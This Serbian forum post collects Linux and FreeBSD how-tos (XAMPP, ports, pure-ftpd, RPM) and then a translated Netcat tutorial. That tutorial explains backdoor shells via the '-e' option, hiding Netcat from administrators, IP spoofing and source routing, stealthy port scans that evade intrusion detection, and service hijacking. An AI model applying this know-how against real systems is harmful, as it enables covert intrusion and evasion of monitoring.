Prijava na forum:
Ime:
Lozinka:
Prijavi me trajno:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:

ConQUIZtador
Trenutno vreme je: 29. Mar 2024, 14:15:03
nazadnapred
Korisnici koji su trenutno na forumu 0 članova i 1 gost pregledaju ovu temu.

 Napomena: Za sva pitanja u vezi kupovine novog hardware-a ili procene vrednosti i preporuke koristite - ovu temu

Spyware,sta je,kako radi,kako se zastititi? :: Kako rade mreze :: Burek Anti-virus software review :: Index tema koje ne treba propustiti

Idi dole
Stranice:
Počni novu temu Nova anketa Odgovor Štampaj Dodaj temu u favorite Pogledajte svoje poruke u temi
Tema: Linux/Unix  (Pročitano 10094 puta)
22. Mar 2007, 15:09:57
Supervizor foruma
Legenda foruma


Violence solves everything

Zodijak Aquarius
Pol Muškarac
Poruke 33826
Zastava Srbija
OS
Linux
Browser
Mozilla Firefox 1.5.0.10
mob
LG Nexus 5
Aplikacije





1. HTTP Proxy-ji   PDF klikni (Link)  Autor Dalibor Gudzic

2. Apache, PHP i MySQL PDF klikni (Link)  Autor Dalibor Gudzic

3. Azuriranje Stabla Portova i Zakazivanje Zadataka PDF klikni (Link)  Autor Dalibor Gudzic

4. Kako koristiti Windows-ov ntloader za pokrentanje Windowsa i FreeBSD-a PDF klikni (Link)  Autor Dalibor Gudzic

5. Mrezno Filtriranje na osnovu Operativnog Sistema PDF klikni (Link)  Autor Dalibor Gudzic

6. Webmin instalacija PDF klikni (Link)  Autor Dalibor Gudzic

7. Uputstvo za Unix-ov Vi PDF klikni (Link)  Autor Dalibor Gudzic

8. Upravljanje Stablom Portova koristeci Portsnap PDF klikni (Link)  Autor Dalibor Gudzic
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



Instalacija XAMPP-servera


 Sami znate koliko sve ima nacina da se na Linux-u instalira server, sve sa bazom; jedan od elegantnijih i laksih nacina da se to uradi je - da se na kompu instalira XAMPP (koji je u Linux-svetu poznatiji pod imenom LAMPP).

********************************************

Jedan od mogucih nacina da to uradite mogao bi da bude i ovaj:

1. Sa adrese http://www.apachefriends.org/en/index.html download-ujte vas XAMPP-paket

2. Udjite u konzolu, i postanite root (ili super-user) komandom "su"

3. Krenite polako sa instalacijom, kucajuci kod:
tar xvfz xampp-linux-1.5.0.tar.gz -C /opt (sva prazna mesta nisu slucajno ostavljena praznima; naravno, kucajte verziju paketa koju vi imate, ovde je samo kao primer data verrzija 1.5.0)

4. Sada startujemo paket:
/opt/lampp/lampp start

5. Idemo na test, da li je sve "ispalo" kako treba. Otvaramo browser, i u njemu tipkamo nasu adresu "u lokalu":
http://localhost


Ako je sve OK, trebalo bi da vam se pojavi naslovna strana, sa ogromnim slovima XAMPP i mogucnoscu izbora jezika.

6. Ostalo nam je jos samo da istestiramo i nas FTP-server, koji bi trebao da je ovom instalacijom vec "u pogonu". Kao standardni user kod XAMPP-a se pojavljuje "nobody" sa svojim password-om "lampp".

Znaci:
Start -- Internet--Data Exchange -- ovde odaberite vas omiljeni FTP-klijent (na primer, gFTP) -- ukucajte podatke iz gornjeg primera (host: localhost, port: 21, user: nobody; password: lampp).

7. XAMPP server zaustavljamo komandom:
/opt/lampp/lampp stop

8. Ukoliko pozelite da se resite ovog servera, to cinite na sledeci nacin (preko konzole):
# cd
# rm -rf /opt/lampp

Sada samo jos pravimo test preko browsera, da vidimo jesmo li stvarno deinstalisali (ili zaustavili, ako zelimo samo da ga ugasimo) XAMPP:

Ponovo pozivamo adresu http://localhost, i ako se pojavi "nasa strana", znaci da smo nesto pogresno uradili. Ako je sve ok, trebalo bi da dobijemo podatak da to sto mi hocemo - ne moze.




Instalacija i update aplikacija(FreeBSD)     



Instalacija i update aplikacija

Nota : Postoje vise metoda,ali ja cu pricati ovde o portsnap + portupgrade.

U trenutnom vremenu dok ovo kucam na FreBSD-u postoji vise od 14000 portovanih aplikacija.Ako poslusate moj savet tj ako pratite ovo objasnjenje vi cete instalirati "drvo ports-a", sto je jedan skup fajlova (nalazi se u /usr/ports) koji sadrzi sve obavezne informacije pruzimanja,kompilacije i instalacije aplikacija.
Gentoo GNU/Linux je veoma kopirao delove ovog sistema


Za pocetak izvrsite jedan update drvo ports-a sa portsnap.
Za preuzimanje poslednjih verzija drvo ports-a:
# portsnap fetch


Prvi put je ovaj proces dosta dugacak ,ali sa sledecim update-om obvaj proces preuzima smao elemente koji su nepohodni tj modifikovani.
Sa prvim koriscenjem vi morati izvaditi,izvesti drvo ports-a :
# portsnap extract


Sledeca komanda preuzima modifikacije i izvrsava tj obnavlja vase drvo ports-a.
# portsnap fetch update


Pre svega bacite jedno oko u fajlu UPDATING,da bi ste proverili da li neki update zahteva neki specificnost(U principu nezahteva).
% less /usr/ports/UPDATING



Za instalaciju jedne aplikacije:
Za kompilaciju:
# portinstall ime_aplikacije


Za instalaciju jednog paketa,ili kompliaciju ako paket nije dostupan:
# portinstall -P ime_aplikacije


Za forsiranje,jednog paketa prekompilovanog :
# portinstall -PP ime_aplikacije



Za pronalazenje jedne aplikacije ,vise solucija:
1.Koriscenje komandne linije u /usr/ports i trazenje preko imena:
% make search name= ime_aplikacije


Za trazenje preko slova tj dela reci :
% make search key=deo_reci



2.Izvedite jednu pretragu preko freshports

Da bi ste saznali aplikacije kojima je obavezan update:
% portversion -Ol "<"


Da izvrsite update aplikacije:
# portupgrade ime_aplikacije

Da izvrsite celokupni update:
# portupgrade -a




Plugin Flash (FreeBSD)   


Plugin flash Macromedia nije i plugin flash za FreeBSD, mi moramo koristiti plugin koji je namenjen za Linux(emulacija).Ova metoda korscenja mora raditi za Operu, Firefox i Mozilla.
Pocinjemo prvo sa instalacijom v6 (zasto verzija 6 a ne verzija 7 postoji mogucnost da Firefox blokira sa verzijom 7).

# portinstall /www/linux-flashplugin6

Instalacija wrapper :
# portinstall /www/linuxpluginwrapper

Kopirajte fajl libmap.conf primer
# cp /usr/local/share/examples/linuxpluginwrapper/libmap.conf-FreeBSD6 /etc/libmap.conf

Kreirajte simbolicke linkove ovo je obavezno da bi browser nasao plugins.
# cd /usr/X11R6/lib/browser-plugins
# ln -s ../linux-flashplugin6/libflashplayer.so
# ln -s ../linux-flashplugin6/flashplayer.xpt

U Firefoxu da bi ste proverili da li su pravilno plugins instalirani ukucajte u adress bar about:plugins.




Instalacija jednog FTP servera na Linuxu.(Pure-ftpd)


1. Instalacija

Sam program je dostupan u izvornom kodu ili binarnom na sledecu adresu.

ftp://ftp.pureftpd.org/pub/pure-ftpd/releases

Instalacija se zavrsava sledecim komandama:
$tar jxvf pure-ftpd-x.x.xxx.tar.bz2
$cd pure-ftpd
$./configure
$make
#make install (kao root)

Mnogo opcija je omoguceno sa./configure, vi mozete da ih pregledate sa ukucavanjem ./configure --help. Pogledaj u nastavku za detaljniju instalaciju.

2.Virtualni korisnici.

2.1. Objasnjenje o virtualnim korisnicima.

Sistem virtualnih korisnika pruza jedno lako i efikasno odrzavanje korisnika vaseg FTP. U plusu omogucava vam kontrolu quote limitiranje konekcije, limitiranje kolicinu poslatih dokumenta za svakog korisnika.

Zato je strogo preporuceno da postavite virtualne korisnike sa uid i gid jedne grupe korisnika vaseg sistema.

#groupadd ftpgroup
#useradd -g ftpgroup -d /dev/null -s /bin/false ftpuser

Ovde je korisnik ftpuser a kao grupa ftpgroup, kao personalna direkcija /dev/null i ne moze da se loguje na vasem sistemu(specifikovan shell nije validan). Ovaj korisnik sitema nema nikakvo pravo a ni vlast.

2.2. Kreiranje virtulanih korisnika.

Fajl koji sadrzi korisnika poseduje jednog korisnika kao liniju i uzima sledecu sintaksu.

<account>:<password>:<uid>:<gid>:<gecos>:<home directory>:<upload bandwidth>:<download bandwidth>:<upload ratio>:<download ratio>:<max number of connections>:<files quota>:<size quota>:<authorized local Ips>:<refused local Ips>:<authorized client IPs>:<refused client Ips>:<time restrictions>

U sledecim poljima<account>, <password>, <uid>, <gid> i <home directory> karakteri su obavezni..

Za kreiranje jednog virtuelnog korisnika koristimo sledecu komandu pure-pw:
#pure-pw useradd <login> [-f <passwd file>] -u <uid> [-g <gid>]
-D/-d <home directory> [-c <gecos>]
[-t <download bandwidth>] [-T <upload bandwidth>]
[-n <max number of files>] [-N <max Mbytes>]
[-q <upload ratio>] [-Q <download ratio>]
[-r <allow client host>[/<mask>][,<allow client host>[/<mask>]]...]
[-R <deny client host>[/<mask>][,<deny client host>[/<mask>]]...]
[-i <allow local host>[/<mask>][,<allow client host>[/<mask>]]...]
[-I <deny local host>[/<mask>][,<deny local host>[/<mask>]]...]
[-y <max number of concurrent sessions>]
[-z <hhmm>-<hhmm>] [-m]

Primer:

#pure-pw useradd user1 -u ftpuser -d /home/ftpusers/user1


Opcija -d njemu omogucava da bude chroot u svojoj kucnoj direkciji,u suprotnom sa -D koja mu omogucava pristup celom sistemu..

Vi uvek mozete da proverite informacije o korisniku sa komandom pure-pw show

#pure-pw show <login> [-f <passwd file>]

Primer:
#pure-pw show krnjo

Login : krnjo
Password : $1$LX/3.F60$bYdYwsQOYIaWq.Ko.hfI3.
UID : 500 (ftpuser)
GID : 101 (ftpgroup)
Directory : /home/ftpusers/krnjo/./
Full name :
Download bandwidth : 0 Kb (unlimited)
Upload bandwidth : 0 Kb (unlimited)
Max files : 1000 (enabled)
Max size : 10 Mb (enabled)
Ratio : 0:0 (unlimited:unlimited)
Allowed local IPs :
Denied local IPs :
Allowed client IPs : 192.168.0.0/16
Denied client IPs : 192.168.1.1,blah.verybadhost.com
Time restrictions : 0900-1800 (enabled)
Max sim sessions : 0 (unlimited)

Simbol ./ na kraju fioldera oznacava da je korisnik chroot.

2.3. Modifikacija virtuelnih korisnika.

Jednom kada je vas korisnik kreiran , vi mozete da izvrsite modifikaciju na njemu komandom pure-pw usermod. Ova komanda funkcionise i kao za dodavanje korisnika.

Ogranicavanje na 1000 fichiers i na 10 mo korisnika user1:
#pure-pw usermod user1 -n 1000 -N 10


M odifikacija lozinke se vrsi komandom pure-pw passwd :
#pure-pw passwd <login> [-f <passwd file>] [-m]

2.4.Brisanje jednog virtualnog korisnika.

Komanda pure-pw userdel nam omogucava brisanje jednog virtualnog korisnika:
#pure-pw userdel <login> [-f <passwd file>] [-m]


Folder korisnika nece biti obrisan to ostaje na vama..

Svo menjenje na serveru i uzimanja novog sadrzaja se zavrsavam komandom
#pure-pw mkdb
Restartovanje pure-ftpd nije obavezno jer sva izmena korisnika sa ovom komandom se efektuje odmah.

3.Kreiranje scripti za automatsko startovanje.

# vi /etc/init.d/pure-ftpd
#! /usr/bin/sh
/usr/local/sbin/pure-ftpd [moje opcije]

Zatim kreiram jedan simbolicki link za podzanje ftp servera prilikom podizanja sistema.

#ln -s /etc/init.d/pure-ftpd /etc/rc2.d/S95pure-ftpd

Ostali programi.

Pure-pw show vam omogucava listanje korisnika koji su na vasem serveru.



Toliko o serveru a sada zelim da vam prikazem kako bih ja kreirao i instalirao.

Dodavanje grupe i korisnika
#groupadd ftpgroup
#useradd -g ftpgroup -d /dev/null -s /etc ftpuser

Dodavanje direktorijuma i dozvola
#mkdir -p /home/ftp/incoming
#chown -R root:ftpgroup /home/ftp/incoming
#chmod -R 755 /home/ftp
#chmod -R 1775 /home/ftp/incoming


Download servera i dekompresija
$wget ftp://ftp.pureftpd.org/pub/pure-ftpd/releases/pure-ftpd-1.0.20.tar.bz2
$tar jxvf pure-ftpd-1.0.20.tar.bz2
$cd pure-ftpd-1.0.20


Instaliranje
$./configure --with-altlog --with-brokenrealpath --with-cookie --with-diraliases --with-ftpwho --with-peruserlimits --with-puredb --with-quotas --with-ratios --with-throttling --with-virtualhosts --with-welcomemsg --without-inetd
$make
#make install (kao root)


Ovde prilikom ./configure mozes da dodas i --with-language=nemacki (ako ima podrsku za nemacki inace se instalira engleski.)


Pravimo scriptu da se podize kada i sistem
# vi /etc/init.d/pure-ftpd
#! /usr/bin/sh
/usr/local/sbin/pure-ftpd -b -B -c 5 -C 3 -E -H -K -U 111:022 -l puredb:/etc/pureftpd.pdb

#ln -s /etc/init.d/pure-ftpd /etc/rc2.d/S95pure-ftpd

Dodajem virtualne korisnike.
#pure-pw useradd ivan68 -m -u ftpuser -d /home/ftp
#pure-pw useradd krnjo -m -u ftpuser -d /home/ftp


Kontrolisem prava korisnika
#pure-pw show krnjo

Menjam password krnji
#pure-pw passwd krnjo

Limitiram krnju da se prijavljujesamo od 18:00 do 23:55
#pure-pw usermod krnjo -z 1800-2355

Pregledavam ko je izvrsio konekciju sa serverom
#pure-ftpwho




Instalacija RPM


Da bi instalirali neki program u Redhat Linux-u koristicemo RPM.
Sa ovim alatom mozete da instalirate, dinstlirate, dogradjujete, proveravate pakete.
Rpm paketi su napisani u sledecem obliku name -1.0-1.i386.rpm
Ovo znaci version 1.0, release 1, za procesor tipa i386.


Installiranje
otkucajte rpm -ivh ime.xxxxxx.rpm

Deinstaliranje
otkucajte rpm - e ime
Morate da koristite ime paketa, ne ime fajla

Dogradjivanje
otkucajte rpm - Uvh ime.xxxxxx.rpm

Pregledanje
otkucajte rpm -q ime
Dobicete ime, verziju i release broj paketa

Proveravanje
otkucajte rpm -V -vv ime
Da bi proverili sve pakete:
otkucajte rpm -Va

Ovo su najkoriscenije opcije.
Koristite man rpm za ostale opcije

Ako zelite da instalirate drugi softver, morate da untar-ujete tar fajl, i da ga sami iskompajlirate.
Iskopirajte tar fajl u temp direktorijum.
Bice raspakovan u poddirektorijum temp direktorijuma sa istim imenom kao tar fajl.
Predjite u poddirektorijum i procitajte readme fajlove.
komanda je:
tar -xvf ime.tar
tar -xvzf ime.tar.gz

"Pechovanje" fajla
Ponekad cete moci da koristite zakrpu da bi dogradili program.
Zakrpa moze biti pokrenuta koristeci: gz tiles
otkucajte zcat patch-x.x.xx.gz | patch -p0
Ako je fajl vec unzip-ovan,
otkucajte patch -p0 < patch_file




Instalacija .tar.gz paketa


 
    Programi u linux-u vrlo cesto znaju doci kao source paket odnosno zapakovani kao datoteka s nastavkom .tar.gz. Kada želite instalirati takav program, prvo morate otpakovati paket koristeci naredbu: tar -xzvf ime_arhive.tar.gz (ta naredba ce napraviti isto kao i da ste prvo upisali gunzip ime_arhive.tar.gz, nakon cega biste dobili datoteku oblika ime_arhive.tar, pa potom tar -xf ime_arhive.tar). Izvršenjem te naredbe dobiti cete direktorij programa koji ste otpakovali. Udite u taj direktorij i potražite .txt datoteku po imenu INSTALL.txt ili slicnog imena. U toj datoteci bi vam tacno trebao biti opisan postupak instalacije. Ovdje je opisan uobicajni postupak instalacije. U direktoriju otpakovanog programa trebalo bi se nalaziti datoteka po imenu configure. Upišite ./configure , nakon toga make i na kraju make install. Ukoliko su svi koraci prošli u redu (bez da vam je javljena greška; Ako se javila greška upišite make clean, te pokušajte ukloniti uzroke greške koje vam je make javio, i potom ponovite postupak ./configure,...), vaš program je instaliran. Da bi ste pokrenuli instalirani program morate pronaci njegovu izvršnu datoteku (najcešce se ona nalazi u direktoriju /usr/local/bin).
Pri konfiguraciji programa sa `./configure', korisno je prvo pokrenuti skriptu sa `--help' opcijom koja ce nam ponuditi compile-time opcije koje možemo ukljuciti ili iskljuciti iz programa. Recimo ako želimo da aplikacija foo ima podršku za feature bar pokrenut cemo configure skriptu sa ./configure --with-bar. Ukoliko configure skripta ne može naci neke header datoteke potrebne za kompilaciju ili dinamicke library-e za linkanje izvršnog programa, potrebno rucno pronaci gdje se te datoteke nalaze, te prije konfiguracije postaviti environment varijable LD_LIBRARY_PATH i CPPFLAGS. Pronalaženje datoteka se može raditi na više nacina:


-naredbama updatedb, i potom locate ime_datoteke

-naredbom find


-u grafickom okruzenju odabiranjem Applications -> File tools -> Find files

Postavljanje environment varijable LD_LIBRARY_PATH i CPPFLAGS:
# export LD_LIBRARY_PATH="/usr/local/lib:/opt/lib:/home/verypoweruser/lib"
# export CPPFLAGS="-I/usr/local/include -I/opt/include -I/usr/include/apache"
# ./configure

Izvor: Tim 1o1
« Poslednja izmena: 26. Mar 2007, 13:50:59 od Crowz »
IP sačuvana
social share
Pogledaj profil WWW
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Supervizor foruma
Legenda foruma


Violence solves everything

Zodijak Aquarius
Pol Muškarac
Poruke 33826
Zastava Srbija
OS
Windows XP
Browser
Mozilla K-Meleon 1.02
mob
LG Nexus 5
Netcat



 
Prosto govoreci, Netcat stvara i prihvata TCP (Transmission Control Protocol) i UDP (User Datagram Protocol) konekcije. To je to! Netcat pise i cita podatke preko ovih konekcija dok se one ne zatvore. To donosi osnovni TCP/UDP mrezni podsistem koji omogucava korisniku da manualno ili preko skripta vrsi interakciju sa mreznim aplikacijama i servisima na aplikativnom nivou. Omogucava nam da vidimo ciste TCP i UDP podatke pre nego sto oni budu umotani u sledeci visi nivo kao sto je FTP (File transfer Protocol), SMTP (Simple Mail Transfer Protocol) ili HTTP (Hypertext Transfer Protocol).
Netcat ne radi nista mastovito. Ne poseduje lep graficki interfejs (GUI) i ne izdaje svoje rezultate u privlacni izvestaj. On je grub, jednostavan i ruzan, ali zbog cinjenice da funkcionise na takvom osnovnom nivou omogucava sebi da bude koristan za mnostvo situacija. Iz cinjenice da sam Netcat ne donosi nuzno nikakve znacajne rezultate ukoliko se ne koristi u tandemu sa drugim alatima ili tehnikama, neiskusni korisnik mogao bi da previdi Netcat kao nista vise nego jedan hvaljeni telnet klijent. Drugi ne bi mogli da vide mogucnosti kroz argumente komandne linije, detaljno opisane u README fajlu.U svakom slucaju, cenicete cinjenicu kako Netcat moze biti jedan od najvrednijih alata u Vasem arsenalu.

Implementacija
Zato sto ima tako puno upotreba, Netcat se cesto poredi sa svajcarskim nozicem (eng. "Swiss army knife") za TCP/IP u UDP. Pre nego sto naucite da ga koristite, naravno, moracete da ga preuzmete (eng. download) sa mreze i instalirate.

Preuzimanje
Netcat se moze pronaci na dosta lokacija, mada mnoge Unix distribucije dolaze sa Netcat binarnim datotekama vec instaliranim, nije losa ideja da pronadete izvorni kod Netcat-a i sami ga kompajlirate. Po standardnom podesavanju, Netcat kode se ne kompajlira u nekoliko opcija koje biste zeleli. Preuzimanjem izvornog koda i pravljenjem izvrsne datoteke, mozete tacno odrediti koje cete Netcat mogucnosti imati na raspolaganju.
Zvanicni sajt za preuzimanje Netcata za Unix i Windows platforme je ovde.
Kada preuzmete tar.gz fajl treba ga otpakovati:

[root@originix tmp]#
ls nc110.tgz
[root@originix tmp]# mkdir nc
[root@originix tmp]# cd nc
[root@originix tmp]# tar zxf ../naziv fajla.tgz
[root@originix tmp]#


 Sada ste spremni za kompajliranje. Slede dve opcije za kompajliranje koje su vazne:
-GAPING_SECURETY_HOLE Kao sto ime sugerise (otvorena bezbednosna rupa), ova opcija moze uciniti Netcat opasnim u pogresnim rukama, ali ga takode fini vrlo mocnim. Sa ovom opcijom ukljucenom, Netcat moze da okupira eksterni program. Ulaz/izlaz (1/0) tog programa ce teci kroz Netcat kanal podataka. Ovo omogucava Netcat-u da se ponasa kao lazni inetd alat, omogucavajuci Vam da izvrsite udaljene komande (kao sto je pokretanje Unix-ovog komandnog okruzenja-eng. shell) jednostavno stvarajuci TCP i UDP konekcije portu koji osluskuje. Ova opcija nije omogucena po unapred podesenom stanju jer postoji veliki potencijal za zloupotrebu i pogresnu podesenost. Medutim, pravilnom upotrebom, ova opcija moze biti kriticna.
-TELNET Uobicajeno, ako koristite Netcat za konekciju sa telnet serverom (koristeci: nc imeservera 23), necete stici daleko. Telnet serveri i klijenti se dogovore oko nekoliko opcija pre nego sto se prikaze odzivna linija za logovanje na sistem. Omogucavanjem ove opcije, Netcat moze odgovoriti ovim telnet opcijama (tako sto ce reci ne svakoj od njih) i omoguciti Vam da pristupite odzivnoj liniji za logovanje. Bez ove mogucnosti, morali biste pisanjem skripta da resite problem odgovaranja telnet opcijama ukoliko ste uopste zeleli da uradite nesto korisno sa Netcat-om i telnetom.

Verovatno niste svesni znacaja ovih opcija u ovom trenutku, ali videcete zasto smo ovo izneli kada vidite neke primere kasnije u ovom poglavlju.
Da biste omogucili obe ove opcije, moracete da dodate DFLAGS liniju na pocetku fajla koji se zove makefile.
# makefile for netcat, based off same ol' "generic makefile".
# Ususally do "make systype" - if your systype isn't defined, try "generic"
# or something else that most closely matches, see where it goes wrong, fix
#it, and MAIL THE DIFFS back to Hobbit.

Instalacija
Necemo pokriti detalje preuzimanja, otpakovanja i izgradnje vecine alata . Ali zbog cinjenice da Vas prvo upoznajemo sa Netcat-om i sto poseduje neke opcije prilikom kompajliranja koje bi mogle da Vas interesuju, bitno je da zavirimo u detalje.

### PREDEFINES
# DEFAULTS, possibly overridden by <systype> recursive call:
# pick gcc if you'd rather, and/or do -g instead of -0 if debugging # debugging
# DFLAGS = -DTEST -DDEBUG
DFLAGS = -DGAPGING_SECURETY_HOLE -DTELNET
CFLAGS = -0
Mozete ukljuciti jednu ili obe ove opcije u DFLAGS liniji. Ukoliko zelite da se poigrate sa primerima koji slede, moracete da ucinite ovu modifikaciju. Medutim, pre nego sto to ucinite, uverite se da ili posedujete sistem na kome radite ili da ste potpuno onemogucili pristup drugih korisnika do izvrsnog fajla koji cete upravo napraviti. Iako je dovoljo lako za druge korisnike da preuzmu sa mreze kopiju Netcat-a i naprave zavrsni fajl sa ovim opcijama, verovatno ne biste voleli da vidite kako Vam je sistem hakovan, jer je neko koristio Vasu "specijalno napravljenu" verziju Netcat-a kao tajni ulaz (eng. backdoor) u Vas sistem.
Sada ste spremni da izvrsite kompajliranje. Jednostavno otkucajte: make systemtype u odzivnoj liniji, gde je systemtype (dovoljno cudno) tip Unix-a koji koristite (koji moze biti: linux, freebsd, solaris itd.) Kada je gotovo, imacete srecni mali 'nc" binarni fajl koji se nalazi u direktorijumu.
Za korisnike Windows-a, Netcat fajl za preuzimanje (ncllnt.zip) takode dolazi i u izvornom kodu, ali zato sto vecina ljudi ne poseduje kompajlere na svojim Windows sistemima, izvrsna verzija je vec kompajlirana sa ove dve opcije standardno. Prema tome, jednostavno otpakujte fajl
i imate spreman "nc.exe".


Komandna linija
Osnovna komandna linija za Netcat je: nc <opcije> host ports, gde je host ime domena ili IP adresa za skeniranje i ports je ili jedan port, ili niz portova (oznacen "m-n") ili individualni portovi odvojeni blanko karakterima (eng. spaces). Sada skoro ste spremni da vidite neke zapanjujuce stvari koje mozete uraditi sa Netcat-om. Medutim prvo pogledajte detaljan pregled svake opcije komande linije da biste imali osnovno razumevanje mogucnosti:
-d Dostupna jedino na Windows-u, ova opcija stavija Netcat u skriveni mod, omogucavajuci mu da se podeli i radi nezavisno od kontrolne MS-DOS odzivne linije. Omogucava da Netcat radi u prislusnom modu bez potrebe da ga drzite u otvorenom komadnom prozoru. Takode pomaze hakeru da bolje sakrije pokrenuti Netcat od sistem administratora.
-e <command> Ukoliko je Netcat kompajliran sa GAPING_SECURITY HOLE opcijom, u prislusnom modu ce izvrsiti <command> kada neko napravi konekciju na port koji Netcat prisluskuje u tom trenutku, dok ce klijent Netcat proslediti podatke drugoj kopiji Netcat-a koja prisluluskuje. Koriscenje ove opcije je izuzetno opasno ukoliko neznate tacno sta radite. To je lak i brz nacin za postavljenje backdoor komandnog okruzenja na sistem (primeri slede).
-i <seconds> Vremenski interval koji je kolicina vremena koje Netcat saceka izmedu slanja podataka. Na primer kada se prosleduje fajl Netcat-u, on ce sacekati <seconds> sekundi pre nego sto posalje sledecu liniju ulaznih podataka. Kada koristite Netcat na vise portova na domenu, Netcat ce sacekati <seconds> sekundi pre nego sto kontaktira sledeci port u liniji. Ovo moze omogucîti korisnicima da stvore prenos podataka ili da napad na servis izgleda manje po skriptu i tako zadrzati Vase skeniranje portova van domasaja radara nekog sistema za detekciju upada i sistem administratora.
-g <route-list> Koriscenje ove opcije moze biti lukavo. Netcat podrzava labavo rutiranje izvora (objasnjeno kasnije u sekciji "Smestite prijatelju: IP varanje"). Mozete naznaciti do osam -g opcija u komandnoj liniji da biste primorali Netcat saobracaj da prolazi preko odredenih IP adresa, sto je korisno ukoliko skrivate IP adresu izvora Vasih podataka (u pokusaju da zaobidete filter mrezne blokade ili liste adresa kojima je dozvoljen pristup) i zelite da primite odziv sa domena. Rutiranje izvora preko masine nad kojom imate kontrolu, mozete naterati pakete podataka da se vrate Vasoj adresi umesto da zavrse na pravoj destinaciji. Imajte na umu da ovo uglavnom nece raditi, jer vecna rutera ignorise opciju rutiranja izvora i vecina filtera portova i mreznih blokada prave log Vasih pokusaja.
-G <hop pointer> Ova opcija Vam omogucava da uticete na to koja IP adresa u Vasoj -g listi ruta je trenutno sledeca. Iz razloga sto su IP adrese 4 bajta u velicini, ovaj argument se uvek javlja u umnoscima broja 4, gde se 4 odnosi na prvu IP adresu u rut listi, 8 na drugu itd. Ovo je korisno ako zelite da falsifikujete delove rut liste izvora da ucinite da izgleda kao da dolazi sa nekog drugog mesta. Stavljajuci lazne adrese na prva dva mesta u Vasoj -g listi i postavljanjem skok pointera -g opcijom na 12, paket ce biti usmeren pravo ka trecoj IP adresi u Vasoj rut listi. Stvarni sadrzaj paket ce, inace, jos uvek sadrzati lazne IP adrese, cineci da izgleda kao da je paket stigao sa jedne lokacije iako je u stvari sa neke druge. Ovo moze pomoci da maskirate odakle dolazite kada vrsite prikrivanje IP adrese i rutiranje izvora, ali necete nuzno biti u mogucnosti da primite odziv jer ce pokusati da preokrene rutu preko Vase falsifikovane IP adrese.
-I Ova opcija ukljucuje i iskljucuje Netcat-ov "prislusni" mod. Ova opcija mora biti koriscena zajedno sa - p opcijom da bi uputili Netcat da se veze za bilo koji TCP port koji naznacite i da ceka dolazece konekcije. Dodajte -u opciju da biste koristili UDP portove umesto TCP.
-L Ova opcija, dostupna jedino u Windows verzijama, je jaca "prislusna" opcija nego -l. Ona nalaze Netcat-u da restartuje prislusni mod sa istim opcijama komandne linije posle zatvaranja konekcije. Ovo omogucava Netcat-u da prihvati buduce konekcije bez intervencije korisnika, cak iako je Vasa inicajlna konekcija zavrsena. Kao i -l, takode zahteva - p opciju.
-n Upucuje Netcat da ne vrsi bilo kakvu pretragu imena domena. Ako koristite ovu opciju na komandnoj liniji, uverite se da ne naznacite bilo koje ime domena kao argument.
-o <hexfile> Vrsi pretvaranje podataka u heksadecimalni kod i prebacuje ih u <hexfile >. Komanda nc -o hexfile snima protok podataka u oba smera i zapocinje svaku liniju sa < ili > da bi se naznacili dolazeci i odlazeci podaci respektivno. Da biste dobili samo hex zapis samo dolazecih podataka, koristili biste komandu nc -o <hexfile, i obrnuto, za odlazeci nc -o >hexfile.
-p <port> Omogucava Vam da naznacite broj lokalnog porta koji ce Netcat koristiti. Ovaj argument je neophodan kada koristite -i ili -L opcije za prislusni mod. Ako nije naznaceno za odlazece konekcije, Netcat ce koristit bilo koji port koji dobije od sistema, bas kao i vecina drugih TCP i UDP klijenta. lmajte na umu da na Unix-u jedino root korsnici mogu naznaciti koriscenje broja porta ispod 1024.
-r Netcat bira lokalni ili udaljeni port. Ovo je korisno kada koristite Netcat da dobijete informacije o velikom opsegu portova na sistemu i zelite da pomesate red i izvornih i destinacionih portova da biste ucinili da manje izgleda kao skeniranje portova. Kad se ova opcija koristi zajedno sa -i opcijom i dovoljno velikim intervalom, port skeniranje ima jos vece sanse da prode nezapazeno osim ukoliko sistem administrator pazljivo i detaljno pregledava logove.
-s Naznacava izvornu IP adresu koju Netcat treba da koristi kada stvara svoje konekcije. Ova opcija omogucava hakerima da rade neke vrlo podle trikove. Prvo, omogucava im da sakriju svoju ili falsifikuju tudu.IP adresu, ali da bi preusmerili bilo koju informaciju preko lazirane adrese, morali bi da koriste -g opciju za rutiranje izvora. Drugo, kada je u prislusnom modu, mnogo puta se mozete "prikaciti" ispred servisa koji se vec prisluskuje. Svi TCP i UDP servisi se vezuju za port, ali se nece svi vezati i za odredenu IP adresu. Mnogi servisi po unapred definisanom stanju prisluskuju sve dostupne interfejse. Syslog, na primer, osluskuje UDP port 514 za syslog saobracaj. Medutim, ako pokrenete Netcat da osluskuje port 514 i upotrebite - s opciju da naznacite izvornu IP adresu, sav saobracaj ka toj naznacenoj IP adresi ce otici prvo ka Netcat-u koji osluskuje! Zasto? Ukoliko soket (sistemski interfejs za implementaciju TCP/IP saobracaja) odredi i port i IP adresu, dobija prioritet nad soketima koje se nisu vezali za specificnu IP adresu. O tome cemo detaljnije govoriti kasnije (vidite deo "Otimanje servisa") i pokazati Vam kako da raspoznate na koji servis se moze prikaciti.
-t Ako se kompajlira sa TELNET opcijom, Netcat ce biti u mogucnosti da obraduje pregovor telnet opcija sa telnet serverom, odgovarajuci sa beznacajnim informacijama, ali Vam omogucava login odzivnu liniju koju ste veorvatno i trazili koristeci Netcat za konekciju na TCP port 23.
-u Nalaze Netcat-u da koristi UDP umesto TCP-a. Funkcionise i u klient i u prislusnom modu.
-v Kontrolise koliko Vam Netcat govori o tome sta radi. Ne koristite -v, i Netcat ce samo izbaciti podatke koje prima. Jedno -v ce Vam omoguciti da znate na koju adresu se povezuje ili konektuje i ako se javi neki problem. Dva -v Vas obavestava koliko podataka je poslato i primljeno na kraju konekcije.
-w <seconds> Kontrolise koliko ce Netcat cekati pre nego sto odustane od konekcije. Takode govori Netcat-u koliko dugo da ceka posle posle primanja EOF (end-of-file- kraja fajla) preko standardnog ulaza i zatvaranja konekcije i izlaza. Ovo je bitno ukoliko saljete komandu kroz Netcat udaljenom serveru i ocekujete veliku kolicinu podataka u povratku (na primer, slanje HTTP komande serveru za preuzimanje velikog fajla).
